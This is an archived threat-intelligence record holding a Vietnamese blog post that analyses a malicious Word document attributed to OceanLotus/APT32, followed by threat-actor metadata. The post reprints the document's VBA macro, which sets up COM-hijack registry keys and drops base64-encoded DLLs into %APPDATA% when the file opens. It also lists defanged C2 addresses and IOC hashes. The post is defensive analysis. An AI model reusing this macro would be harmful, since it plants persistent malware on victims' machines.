{
	"id": "34c97bb9-b66e-48b6-b0aa-122a6cf50c5b",
	"created_at": "2026-04-06T02:10:46.260043Z",
	"updated_at": "2026-04-10T03:36:22.195931Z",
	"deleted_at": null,
	"sha1_hash": "c489ff97d2bdfe6bc7a0ecc4cef5252fdf2b936a",
	"title": "Thưởng tết….",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1895234,
	"plain_text": "Thưởng tết….\r\nBy m4n0w4r\r\nPublished: 2019-06-02 · Archived: 2026-04-06 01:39:04 UTC\r\n5 min read\r\nMay 31, 2019\r\nVô tình nhặt được cái sample:\r\nhttps://www.virustotal.com/gui/file/9f59c397d1346f2707fc7b54fe6cb4622770accf94eb4394514d2bf167d65007/detection\r\nPress enter or click to view image in full size\r\nKĩ thuật sử dụng trong tài liệu này có vẻ liên quan đến OceanLotus (aka APT-32):\r\nhttps://unit42.paloaltonetworks.com/tracking-oceanlotus-new-downloader-kerrdown/\r\nThông tin metadata của sample:\r\nhttps://tradahacking.vn/th%C6%B0%E1%BB%9Fng-t%E1%BA%BFt-fbcbbed49da7\r\nPage 1 of 8\n\nDạo vòng vòng trong sample để thu thập thêm thông tin: 😉\r\nPress enter or click to view image in full size\r\nToàn bộ VBA code của sample:\r\nhttps://tradahacking.vn/th%C6%B0%E1%BB%9Fng-t%E1%BA%BFt-fbcbbed49da7\r\nPage 2 of 8\n\n' module: ThisDocumentAttribute VB_Name = \"ThisDocument\"\r\nAttribute VB_Base = \"1Normal.ThisDocument\"\r\nAttribute VB_GlobalNameSpace = False\r\nAttribute VB_Creatable = False\r\nAttribute VB_PredeclaredId = True\r\nAttribute VB_Exposed = True\r\nAttribute VB_TemplateDerived = True\r\nAttribute VB_Customizable = True\r\nPrivate Sub Document_Open()\r\n On Error Resume Next\r\n Dim sAppData As String\r\n sAppData = Environ(\"APPDATA\")\r\n sAppData = sAppData \u0026 \"\\main_background.png\"\r\n Dim sAppDataNew As String\r\n sAppDataNew = Chr(34) \u0026 sAppData \u0026 Chr(34)\r\n Dim myWS As Object, strPath\r\n Set myWS = CreateObject(\"WScript.Shell\")\r\n Set fsoCheck = VBA.CreateObject(\"Scripting.FileSystemObject\")\r\n Dim iCheck As Boolean\r\n iCheck = False\r\n #If Win64 Then\r\n #Else\r\n If (fsoCheck.FileExists(\"C:\\Windows\\SysWOW64\\cmd.exe\") = True) Then\r\n iCheck = True\r\n Else\r\n iCheck = False\r\n End If\r\n #End If\r\n If iCheck = True Then\r\n Dim wsh As Object\r\n Set wsh = VBA.CreateObject(\"WScript.Shell\")\r\n Dim waitOnReturn As Boolean: waitOnReturn = True\r\n Dim windowStyle As Integer: windowStyle = 0\r\n wsh.Run \"cmd.exe /S /C reg add HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{2DEA658F-54C1-4227-AF9\r\n Else\r\n If RegKeyExists(\"HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\\") = False Then\r\n myWS.RegWrite \"HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\\", \"\", \"REG_SZ\"\r\n Else\r\n End If\r\n If RegKeyExists(\"HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{2DEA658F-54C1-4227-AF9B-260AB5FC3543}\r\n If RegKeyExists(\"HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{2DEA658F-54C1-4227-AF9B-260AB5FC3\r\n myWS.RegWrite \"HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{2DEA658F-54C1-4227-AF9B-260AB5F\r\n Else\r\n End If\r\n myWS.RegWrite \"HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{2DEA658F-54C1-4227-AF9B-260AB5FC354\r\n Else\r\n End If\r\nhttps://tradahacking.vn/th%C6%B0%E1%BB%9Fng-t%E1%BA%BFt-fbcbbed49da7\r\nPage 3 of 8\n\nEnd If\r\n Dim b As String\r\n Dim a As String\r\n Dim tableNew As Table\r\n Set tableNew = ActiveDocument.Tables(1)\r\n If (iCheck = True) Then\r\n a = tableNew.Cell(1, 1).Range.Text\r\n a = Left(a, Len(a) - 2)\r\n b = Base64Decode(a, sAppData)\r\n Else\r\n a = tableNew.Cell(1, 2).Range.Text\r\n a = Left(a, Len(a) - 2)\r\n b = Base64Decode(a, sAppData)\r\n End If\r\nEnd Sub\r\nFunction RegKeyExists(i_RegKey As String) As Boolean\r\n Dim myWS As Object\r\n On Error GoTo ErrorHandler\r\n Set myWS = CreateObject(\"WScript.Shell\")\r\n myWS.RegRead i_RegKey\r\n RegKeyExists = True\r\n Exit Function\r\n ErrorHandler:\r\n 'key was not found\r\n RegKeyExists = False\r\nEnd Function\r\nFunction Base64Decode(ByVal vCode, ByVal sPath)\r\n Dim oXML, oNode\r\n Set oXML = CreateObject(\"Msxml2.DOMDocument.3.0\")\r\n Set oNode = oXML.CreateElement(\"base64\")\r\n oNode.dataType = \"bin.base64\"\r\n oNode.Text = vCode\r\n Set objStream = CreateObject(\"ADODB.Stream\")\r\n objStream.Type = 1\r\n objStream.Open\r\n objStream.Write oNode.nodeTypedValue\r\n objStream.SaveToFile sPath, 2\r\n Set objStream = Nothing\r\n Set oNode = Nothing\r\n Set oXML = Nothing\r\nEnd Function\r\nCơ bản VBA code này làm nhiệm vụ:\r\nhttps://tradahacking.vn/th%C6%B0%E1%BB%9Fng-t%E1%BA%BFt-fbcbbed49da7\r\nPage 4 of 8\n\nCấu thành đường dẫn cho tập tin main_background.png: %APPDATA%\\main_background.png\r\nKiểm tra môi trường hiện hành là 32-bit hay 64-bit. Nếu là 64-bit thì sẽ thực thi lệnh:\r\nwsh.Run \"cmd.exe /S /C reg add HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{2DEA658F-54C1-4227-AF9B-260AB5\r\nngược lại, thực thi lần lượt:\r\nmyWS.RegWrite \"HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{2DEA658F-54C1-4227-AF9B-260AB5FC3543}\\\", \"\", \"R\r\nDựa vào từ khóa InprocServer32, ta có thể biết được file %APPDATA%\\main_background.png sẽ là\r\nmột tập tin dll\r\nSau khi thiết lập thành công Registry, tiến hành decode base64data và ghi ra file main_background.png. Dựa\r\nvào biến iCheck để drop ra dll x64 hay dll x32:\r\nSet tableNew = ActiveDocument.Tables(1)\r\n If (iCheck = True) Then\r\n a = tableNew.Cell(1, 1).Range.Text //lấy base64data tại hàng 1 cột 1 (32bit-dll)\r\n a = Left(a, Len(a) - 2)\r\n b = Base64Decode(a, sAppData)\r\n Else\r\n a = tableNew.Cell(1, 2).Range.Text //lấy base64data tại hàng 1 cột 2 (64-bit dll)\r\n a = Left(a, Len(a) - 2)\r\n b = Base64Decode(a, sAppData)\r\n End If\r\nPress enter or click to view image in full size\r\nCăn cứ vào thông tin có được tiến hành decode để lấy các binary. Có thể debug hoặc là dùng Cyberchef:\r\n32-bit dll:\r\nPress enter or click to view image in full size\r\nhttps://tradahacking.vn/th%C6%B0%E1%BB%9Fng-t%E1%BA%BFt-fbcbbed49da7\r\nPage 5 of 8\n\n64-bit dll:\r\nPress enter or click to view image in full size\r\nTôi thấy attacker có vẻ hơi nhầm trong quá trình decode và ghi ra file. Nếu là OS 64-bit thì lại drop ra 32-\r\nbit dll. Còn ngược lại, với OS 32-bit lại drop ra 64-bit dll 😕\r\nKiểm tra sơ bộ các dll\r\nVới 32-bit dll:\r\nPress enter or click to view image in full size\r\nPress enter or click to view image in full size\r\nhttps://tradahacking.vn/th%C6%B0%E1%BB%9Fng-t%E1%BA%BFt-fbcbbed49da7\r\nPage 6 of 8\n\n000000011530 000010013730 0 XA:\\Code\\Macro_NB2\\Request\\PostData32.exe -u hxxps://syn[.]servebbs\r\nVới 64-bit dll:\r\nPress enter or click to view image in full size\r\nPress enter or click to view image in full size\r\n000000014243 0000000141D0 0 YA:\\Code\\Macro_NB2\\Request\\PostData64.exe -u hxxps://syn[.]servebb\r\nThử load file về nhưng C2 đã dẹo:\r\nPress enter or click to view image in full size\r\nIOCs:\r\nDoc sample: 9f59c397d1346f2707fc7b54fe6cb4622770accf94eb4394514d2bf167d65007\r\nGet m4n0w4r’s stories in your inbox\r\nhttps://tradahacking.vn/th%C6%B0%E1%BB%9Fng-t%E1%BA%BFt-fbcbbed49da7\r\nPage 7 of 8\n\nJoin Medium for free to get updates from this writer.\r\nRemember me for faster sign in\r\nDropped file (based on architecture):\r\n32-bit dll: ee1e3956df9f69ae3c87a53075881f65\r\n64-bit dll: c74a24dea88999797aaceeecd63efaff\r\nSome C2:\r\nhxxps://word[.]webhop[.]info ( 109[.]248[.]149[.]96)\r\nhxxps://syn[.]servebbs[.]com ( 194[.]9[.]177[.]13)\r\nPress enter or click to view image in full size\r\nEnd.\r\nSource: https://tradahacking.vn/th%C6%B0%E1%BB%9Fng-t%E1%BA%BFt-fbcbbed49da7\r\nhttps://tradahacking.vn/th%C6%B0%E1%BB%9Fng-t%E1%BA%BFt-fbcbbed49da7\r\nPage 8 of 8",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://tradahacking.vn/th%C6%B0%E1%BB%9Fng-t%E1%BA%BFt-fbcbbed49da7"
	],
	"report_names": [
		"th%C6%B0%E1%BB%9Fng-t%E1%BA%BFt-fbcbbed49da7"
	],
	"threat_actors": [
		{
			"id": "af509bbb-8d18-4903-a9bd-9e94099c6b30",
			"created_at": "2023-01-06T13:46:38.585525Z",
			"updated_at": "2026-04-10T02:00:03.030833Z",
			"deleted_at": null,
			"main_name": "APT32",
			"aliases": [
				"OceanLotus",
				"ATK17",
				"G0050",
				"APT-C-00",
				"APT-32",
				"Canvas Cyclone",
				"SeaLotus",
				"Ocean Buffalo",
				"OceanLotus Group",
				"Cobalt Kitty",
				"Sea Lotus",
				"APT 32",
				"POND LOACH",
				"TIN WOODLAWN",
				"Ocean Lotus"
			],
			"source_name": "MISPGALAXY:APT32",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "870f6f62-84f5-48ca-a18e-cf2902cd6924",
			"created_at": "2022-10-25T15:50:23.303818Z",
			"updated_at": "2026-04-10T02:00:05.301184Z",
			"deleted_at": null,
			"main_name": "APT32",
			"aliases": [
				"APT32",
				"SeaLotus",
				"OceanLotus",
				"APT-C-00",
				"Canvas Cyclone"
			],
			"source_name": "MITRE:APT32",
			"tools": [
				"Mimikatz",
				"ipconfig",
				"Kerrdown",
				"Cobalt Strike",
				"SOUNDBITE",
				"OSX_OCEANLOTUS.D",
				"KOMPROGO",
				"netsh",
				"RotaJakiro",
				"PHOREAL",
				"Arp",
				"Denis",
				"Goopy"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "5da6b5fd-1955-412a-81aa-069fb50b6e31",
			"created_at": "2025-08-07T02:03:25.116085Z",
			"updated_at": "2026-04-10T02:00:03.668978Z",
			"deleted_at": null,
			"main_name": "TIN WOODLAWN",
			"aliases": [
				"APT32 ",
				"Cobalt Kitty",
				"OceanLotus",
				"WOODLAWN "
			],
			"source_name": "Secureworks:TIN WOODLAWN",
			"tools": [
				"Cobalt Strike",
				"Denis",
				"Goopy",
				"JEShell",
				"KerrDown",
				"Mimikatz",
				"Ratsnif",
				"Remy",
				"Rizzo",
				"RolandRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "2439ad53-39cc-4fff-8fdf-4028d65803c0",
			"created_at": "2022-10-25T16:07:23.353204Z",
			"updated_at": "2026-04-10T02:00:04.55407Z",
			"deleted_at": null,
			"main_name": "APT 32",
			"aliases": [
				"APT 32",
				"APT-C-00",
				"APT-LY-100",
				"ATK 17",
				"G0050",
				"Lotus Bane",
				"Ocean Buffalo",
				"OceanLotus",
				"Operation Cobalt Kitty",
				"Operation PhantomLance",
				"Pond Loach",
				"SeaLotus",
				"SectorF01",
				"Tin Woodlawn"
			],
			"source_name": "ETDA:APT 32",
			"tools": [
				"Agentemis",
				"Android.Backdoor.736.origin",
				"AtNow",
				"Backdoor.MacOS.OCEANLOTUS.F",
				"BadCake",
				"CACTUSTORCH",
				"CamCapture Plugin",
				"CinaRAT",
				"Cobalt Strike",
				"CobaltStrike",
				"Cuegoe",
				"DKMC",
				"Denis",
				"Goopy",
				"HiddenLotus",
				"KOMPROGO",
				"KerrDown",
				"METALJACK",
				"MSFvenom",
				"Mimikatz",
				"Nishang",
				"OSX_OCEANLOTUS.D",
				"OceanLotus",
				"PHOREAL",
				"PWNDROID1",
				"PhantomLance",
				"PowerSploit",
				"Quasar RAT",
				"QuasarRAT",
				"RatSnif",
				"Remy",
				"Remy RAT",
				"Rizzo",
				"Roland",
				"Roland RAT",
				"SOUNDBITE",
				"Salgorea",
				"Splinter RAT",
				"Terracotta VPN",
				"Yggdrasil",
				"cobeacon",
				"denesRAT",
				"fingerprintjs2"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775441446,
	"ts_updated_at": 1775792182,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c489ff97d2bdfe6bc7a0ecc4cef5252fdf2b936a.pdf",
		"text": "https://archive.orkl.eu/c489ff97d2bdfe6bc7a0ecc4cef5252fdf2b936a.txt",
		"img": "https://archive.orkl.eu/c489ff97d2bdfe6bc7a0ecc4cef5252fdf2b936a.jpg"
	}
}